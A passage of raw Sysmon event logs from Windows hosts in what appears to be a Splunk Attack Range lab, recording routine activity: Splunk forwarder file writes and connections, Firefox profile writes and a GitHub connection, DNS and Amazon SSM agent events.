Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BE5569B26EA19D5274F492F0CAE4F6E,SHA256=368FB40D5B918751FA78B65D04BF132E891AFFFABB52BC0A2D61907F71CA1072,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:55.760{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=178F677AB27E41B1036E30D37A5AEFD5,SHA256=5A2CF681B2833A3FA9E996D87FE5D9EE9301ECB8BA3A00DA834A850431340021,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044756Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:55.096{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59449804ACF905558138522F2A2C0001,SHA256=57D538E9CD8ECAC1E2F438A4F7E153271BE45DCF327B7952F3F90AEBD8F6E1AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:56.878{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FB08BD07028DC08251AFCE68699FBD9,SHA256=3E8A41A11D451D0FF624F09C398AF665BE01DFD8B8E1C0692FC76D3BB40AB96C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044757Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:56.190{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104A30CDBEAD002BFCC2018515FB3CFC,SHA256=41E5099BE436B463C9BC481C54AD73C648FDCAF4BF541CB5F40081E0589A506E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044759Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:54.618{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52377-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044758Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:57.283{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AA1725C94FC6893716F10AFE8975462,SHA256=DD79587153066F5CB85C9505873B1B0E333C62298B2F40CE3B76CB0BC5EB5FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044760Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:58.377{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0820C5B8491B6286570C583011504AEA,SHA256=313AB49C8CEBC492656C63FB3D6094EA028B12AA979FE8868A40962B7C9EF344,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:58.000{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E5A07707DF65CC3ACE9C386D59E2E3D,SHA256=7371632F467AD3D4CC2EB5EACC39306F8CB5454651E7CD935D694570D6563FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044761Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:59.471{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=565FB34752DB9B108211C31E59899670,SHA256=3E96C523A461E9F19726BA663AE7F8BE143EAC8FD7E23FD12274E77B71EEC749,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000205914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:59.985{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\SiteSecurityServiceState-1.txt2022-06-03 14:20:59.980 23542300x8000000000000000205913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:59.985{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\SiteSecurityServiceState-1.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000205912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:59.980{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\SiteSecurityServiceState-1.txt2022-06-03 14:20:59.980 354300x8000000000000000205911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:56.827{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56417-false10.0.1.12-8000- 23542300x8000000000000000205910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:59.131{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C943870D6B81FEB6BE6116F811CC244,SHA256=055D25C7869A584170275FB5ECC0B9459A15C5C57934A6E433C9C1A66A8E7B9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044762Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:00.565{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=438B9B31D359817D533EBF751B0D96CB,SHA256=22B25429A1F02983D57447712EDC6E7DE6198FA5CE5D8F5AB4E5252E28AB2377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:00.848{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D0501AE2C697F95B89AB3F43E10A1217,SHA256=07CD304F5645D817C26A29C46727680D8DBD523763EC85A2BC47867AF7490DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:00.248{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A1352D0DD30B505644680305C83A734,SHA256=616611CB6B276957FE2A41B787E9FBC546D588377691DB7BC53C9D0B3BC385A8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044764Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:59.759{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52378-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044763Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:01.658{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56FE0597D2BA9D247AC5FE240D06B064,SHA256=6F5494C5CEFD7340830500D7E1A7E0BFDD6D0278715619157B40ED19CC686070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:01.264{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7F8479EDDC282167F57D3C4D3CFB9E3,SHA256=9718A8A3D1EBBD6FF1A86D6F5A4F085AC86ED4E1B260E617081F732AFF54051D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044766Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:02.752{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A25CE74501C37C736A59527E91D66C,SHA256=3258DEC4490DCF61753E07AED86FBBEB9D0A1AF49E5EFB8C0DD74B5A22017DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044765Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:02.752{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C2852ECCEB2311CF2C06D9F1CD69CEB4,SHA256=F8F7CAD3FE84CC27C754FDD71D08E9ACD34893F701BCF3B51A2D179FC976F167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:02.282{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C19F84FB5CD91938695EFF967A2237D3,SHA256=B99E4AACC9DDC7D0DC7537CC5895EF7D44D99DF85522CAF0D86F555B28530F61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:02.232{2E1864BB-FA4D-6299-5F07-000000005F02}65326536C:\Program Files\Mozilla Firefox\firefox.exe{2E1864BB-FA55-6299-6807-000000005F02}6384C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+26a20|C:\Program Files\Mozilla Firefox\xul.dll+e46fbd|C:\Program Files\Mozilla Firefox\xul.dll+e47819|C:\Program Files\Mozilla Firefox\xul.dll+e47acf|C:\Program Files\Mozilla Firefox\xul.dll+11c4aab|C:\Program Files\Mozilla Firefox\xul.dll+e4470d|C:\Program Files\Mozilla Firefox\xul.dll+e282b0|C:\Program Files\Mozilla Firefox\xul.dll+1fab4b2|C:\Program Files\Mozilla Firefox\xul.dll+1a0a601|C:\Program Files\Mozilla Firefox\xul.dll+1a0c585|C:\Program Files\Mozilla Firefox\xul.dll+17c0011|C:\Program Files\Mozilla Firefox\xul.dll+1c3b04a|C:\Program Files\Mozilla Firefox\xul.dll+1dccef3|C:\Program Files\Mozilla Firefox\xul.dll+17c04b3|C:\Program Files\Mozilla Firefox\xul.dll+1c3b04a|C:\Program Files\Mozilla Firefox\xul.dll+1dccef3|C:\Program Files\Mozilla Firefox\xul.dll+17bd3ad|C:\Program Files\Mozilla Firefox\xul.dll+18a2c95|C:\Program Files\Mozilla Firefox\xul.dll+1ad380e|C:\Program Files\Mozilla Firefox\xul.dll+1793153|C:\Program Files\Mozilla Firefox\xul.dll+cd4369|C:\Program Files\Mozilla Firefox\xul.dll+cd4ee1 23542300x800000000000000044767Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:03.846{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27831AA239A653DF83030D7C3695B00E,SHA256=96335DE4CEE27AB41D53C21DB3FBCA88A8AD1E95B4AA8BD63E7C556C2112F2F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:03.401{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83DFF1E6C71F1548DF61626C37EFDB0B,SHA256=6C4B6D3674F1683C9677EC46541919C64247B19D222F4F9A11725868EFDF7454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044769Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:04.940{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C20765FD18441ADB12EAAA50BFE4978F,SHA256=F1C0B2E73C4C4AFCFB2432C8447922B1481A31A293D09C21D8DB15F2A2B459C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:02.812{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56418-false10.0.1.12-8000- 23542300x8000000000000000205922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:04.520{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A9573AC778C6497C9D6ABB217A67FCE,SHA256=CDD7241065C6D63A8F1EC17FEAF35CF555A03954DC127C4BEAFC253AB157CE2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044768Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:04.252{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:04.251{2E1864BB-FA4D-6299-5F07-000000005F02}65326536C:\Program Files\Mozilla Firefox\firefox.exe{2E1864BB-FA55-6299-6807-000000005F02}6384C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+26a20|C:\Program Files\Mozilla Firefox\xul.dll+e46fbd|C:\Program Files\Mozilla Firefox\xul.dll+e47467|C:\Program Files\Mozilla Firefox\xul.dll+852452|C:\Program Files\Mozilla Firefox\xul.dll+8468c1|C:\Program Files\Mozilla Firefox\xul.dll+19c8f05|C:\Program Files\Mozilla Firefox\xul.dll+16ef976|C:\Program Files\Mozilla Firefox\xul.dll+19f7fd5|C:\Program Files\Mozilla Firefox\xul.dll+9c80df|C:\Program Files\Mozilla Firefox\xul.dll+1f61e|C:\Program Files\Mozilla Firefox\xul.dll+181848|C:\Program Files\Mozilla Firefox\xul.dll+1807ef|C:\Program Files\Mozilla Firefox\xul.dll+44a50d1|C:\Program Files\Mozilla Firefox\xul.dll+450fd42|C:\Program Files\Mozilla Firefox\xul.dll+4510b6c|C:\Program Files\Mozilla Firefox\xul.dll+1faed83|C:\Program Files\Mozilla Firefox\firefox.exe+a761|C:\Program Files\Mozilla Firefox\firefox.exe+1c968|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:05.536{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE35389EA31CAF4D544BE221C08E863,SHA256=E5FF5A2607FB83B9D48CABCE6D596652265CC6B77EBF4F308CFA669E2DB9EDAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044770Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:03.790{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52379-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000205928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:04.936{2E1864BB-FA4D-6299-5F07-000000005F02}6532C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56419-false140.82.121.3lb-140-82-121-3-fra.github.com443https 354300x8000000000000000205927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:04.935{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local50432-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:04.935{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local50432- 23542300x8000000000000000205925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:06.584{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCEBAB5957E6DC48397F85CF4BED7822,SHA256=E705ED597C0F207288C3A87E78DA0B78E100F6F2161FD0F00D298060002AE725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044771Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:06.033{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=292A91E53BD6EDD38EB7FF8D17F4D0B6,SHA256=599457797A08E07C685E846BB3495B9E992C49D217AF384E23EE5D5B0BD29859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:07.718{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0F06FD0895AF420907ED936E7FD3E4,SHA256=24B3011619A3FF587E0E48E82409806503F4044D25133C9DF3468836DDF9C137,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044773Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:04.806{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52380-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044772Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:07.127{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF605FBCC37F4D3897F2BBE20B1E8D45,SHA256=2821F03F120210CA5F8663A7F77FD37C1E299FD03BC839EC12C4B6941F3BB7C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:08.752{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBC81B19F097E42DB6AB9216722B8AE6,SHA256=C9C7D7A362764D3039A2F2C0A1B648AD062B1A7CD2EB105FC4E58B32785A60C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044774Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:08.221{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67CFF1D870590769066AD60DA5E20E14,SHA256=BF7198D721AB9AAA8EFD5115F3E57A50ACC49AC77A58C7DE113FFE8EBE45852B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:09.940{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-230MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:09.869{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=622121056BC94B9AE306CA624EC7FBAA,SHA256=A50A1A63A4B138A4E65B22B9B91EBCD67838E6A4CD4447747E928514370DC263,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044775Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:09.315{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28E840BE5CE71CCA7D58542F64AD5480,SHA256=DE275C20218DBD6C31AF2AB008C7BCBFA5F17E42655F093704FD14C7442BF070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:10.954{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-231MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:10.906{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D2C9D97B49DD96495DCD081F99977DB,SHA256=F5E1BF50FB40FAB3072FF6AA2D5C16E3DD8168F8B2519A6DDEB613789181EE74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044776Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:10.408{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 